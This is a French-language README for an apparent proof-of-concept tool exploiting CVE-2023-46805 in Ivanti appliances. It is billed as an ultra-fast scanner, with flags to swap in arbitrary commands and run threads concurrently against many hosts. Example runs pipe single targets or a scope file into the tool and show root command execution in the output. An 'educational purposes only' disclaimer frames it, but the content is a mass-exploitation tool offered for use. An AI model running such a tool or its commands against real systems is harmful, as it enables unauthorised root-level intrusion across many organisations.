
CVE-2023-46805 Ivanti POC RCE - Scanner ultra rapide.
Titre : Preuve de concept pour CVE-2023-46805 - À des fins éducatives uniquement
Licence : Cette œuvre est placée sous la licence Creative Commons Attribution 4.0 International (CC BY 4.0). Vous êtes libre de partager, copier, distribuer et transmettre cette œuvre, de l'adapter ou de l'utiliser à d'autres fins, à condition que la paternité en soit correctement attribuée.
Avertissement : Cette preuve de concept (PoC) est fournie uniquement à des fins éducatives et de recherche en cybersécurité. Ni l'auteur, ni l'organisation affiliée, ni toute autre partie impliquée dans la création, la production ou la livraison de ce contenu ne pourra être tenue responsable de tout dommage, y compris, sans s'y limiter, les dommages directs, indirects, accessoires, spéciaux, consécutifs ou punitifs découlant de l'utilisation ou de l'incapacité à utiliser ce contenu.
Objectif pédagogique : Cette PoC a pour but d'aider la communauté de la cybersécurité à comprendre et à atténuer la vulnérabilité identifiée comme CVE-2023-46805. Elle ne doit pas être utilisée dans un environnement de production ni pour des activités malveillantes.
Description de la vulnérabilité : Ivanti RCE
Détails de la PoC :
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'